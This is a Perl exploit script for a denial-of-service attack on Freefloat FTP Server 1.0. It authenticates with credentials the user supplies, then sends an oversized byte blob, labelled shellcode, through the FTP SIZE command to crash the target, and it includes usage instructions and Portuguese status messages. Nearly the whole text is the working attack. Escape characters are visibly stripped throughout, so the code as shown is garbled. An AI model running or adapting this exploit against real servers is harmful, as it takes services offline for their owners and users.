FreeFloat FTP Server version 1.0 SIZE denial of service exploit.
#!/usr/bin/perl -w
#
# e-mail: [email protected]
#
# Date: 06/09/2021 - 09 jun
#
# Version Vulnerable: Freefloat FTP Server 1.0
#
# vídeo: https://youtu.be/de3lCDHLWFE
#
# OS Tested: Windows XP PACK 3 Brazilian
#
use Net::FTP;
use Term::ANSIColor;
$sis="$^O";
print $sis;
if ($sis eq "windows"){
$cmd="cls";
} else {
$cmd="clear";
}
system("$cmd");
if ((!$ARGV[0]) || (!$ARGV[1])) {
&apresentacao();
}
sub apresentacao {
print q {
#############################################################################
# #
# [*] Freefloat FTP Server 1.0 - 'SIZE' - Denied of Service #
# #
# Author: Fernando Mengali #
# #
# [+] Modo de uso: perl exploit.pl <IP> <Porta> #
# #
############################ Code Exploit ###################################
}
}
our $alvo = $ARGV[0];
our $porta = $ARGV[1];
if (!$ARGV[0] && !$ARGV[1]) {
exit;
}
if($alvo !~ /(d{1,3}.d{1,3}.d{1,3}.d{1,3})/) {
print color('red bold');
print " nn [-] Por favor, defina o IP alvo! nn";
color('reset');
exit;
}
if($porta < 0 || $porta > 65535) {
print color('red bold');
print " nn [-] Por favor, defina uma porta de 1 a 65535! nn";
color('reset');
exit;
}
print color('green bold');
print "nnAlvo definido =>" .$alvo . " n n";
print "Porta definida =>" .$porta . "nn";
color('reset');
print color('yellow bold');
print "[+] Por favor, informe a nome de usuário: ";
color('reset');
print color('red bold');
my $usuario = <stdin>;
chomp($usuario);
color('reset');
print color('yellow bold');
print "[*] Por favor, informe a senha de acesso: ";
color('reset');
print color('red bold');
my $senha = <stdin>;
chomp($senha);
color('reset');
my $shellcode =
"xbax17x61x66xafxdbxd9xd9x74x24xf4x5dx2bxc9" .
"xb1x60x31x55x12x83xedxfcx03x42x6fx84x5axb7" .
"xa9xf0x15x7bxd9xfbx8fxf7x01x08x75xdcx80x41" .
"xd3x13x51xbaxe7x11x4dx39x25x21xb3x27x8bx30" .
"xefxf1xacxbdx95xe9xcfx1ax1dxb9xe1xf6x27x0b" .
"xffx02x98xc0xf6xc7x19x52xc4x94x18xdbx56x20" .
"xb6x9axc4xb5xecxf3x40xd4x19x17x6dx35x50x3a" .
"x13xc3xb3xf0x38x8dxffxc5x05x55x33xe7xd2x9e" .
"xb6x8cx9bx79xcex8fxd6x30x72x12x62x26x3exed" .
"xefxdax23x88x07x74xdcxbexe1xc4x3ex91x8ax26" .
"x3ax3fx2bxf2xe5x3ax18x0fxd0x8dx7bxbaxf3xba" .
"x2bx5bxa5x2dx54xaax88x68x4bxf4xccx24x68xc1" .
"x19x22xf9x08xd6x08x8fx4axe0x7dx67xc1x4exd8" .
"x08x34x44x2bx6ax6fx41x6dx53x26x73x9dxb4xca" .
"x87xedxe6x2dx8bx1cx42x0exb3x20xd0xa1x48x97" .
"x45x46x26x6bxe7x74x52xc1xaex2dx8dx1ax06xe0" .
"x24x26xbexfex26xf8x48x75x73x5dx6cx67xebxf4" .
"xf4x08x91xf8x5fx4ax3axd4x5cxd4x7cx52x13xa5" .
"x08x06xc9x8bx04x9ax0fxe5xe8x1fxefx28x3bxe9" .
"x6exf9xeex7exf0x5cx5ex4fx95x49x0fx83xf0x70" .
"x09xf6x83xe9x43xb8xe0x88x51x6ex9cx5dx48x5b" .
"x9bxcax9axf1x48xa8x51x22x61x12x55xfex10x16" .
"xb5x42x42xffx15x14x3fx44x9bx92xfcxd9x67xe0" .
"x15xd1x64xcex75xecxa3x08x03x61x4ax3bx0ex5a" .
"xb0x7bxe6x2cxacxaex5dxadx71xf5xb8xc4x4fxd3" .
"xf4x40x2bx92x75x83xe3x0fx4cx23x78x72x0fx22" .
"xb9x10xa6x1dxc9xcbxcaxe5x61xf8x5fx64x86x49" .
"x5bxb2x9ex75x30xc6x6ex3cx9ax02xadx03x36x29" .
"xafx84x62x98x22xcdxbfx7exa2x14x97x75xa2xc3" .
"xab";
$payload = $shellcode . "rn";
print color('cyan');
print "nn[+] Conectando para o servidor " . $alvo . ":" . $porta."... n";
$ftp = Net::FTP->new($alvo, Debug => 0, Port => $porta) || die color('red')."n[-] Não foi possível conectar. n";
sleep(2);
print "[+] Conectado!n";
sleep(2);
$ftp->login($usuario,$senha) || die color('red')."n [-] Não pode conectar ou você derrubou: $!";
print "[+] Autenticando...n";
sleep(2);
print "[+] Autenticado com sucesso!nn";
sleep(2);
print "[*] Sobrecarregando o servidor...nn";
sleep(2);
$ftp->command("SIZE ", $payload);
color('reset');
print color('green bold');
print "[+] Servidor fora do ar!n";
color('reset');
exit(0);
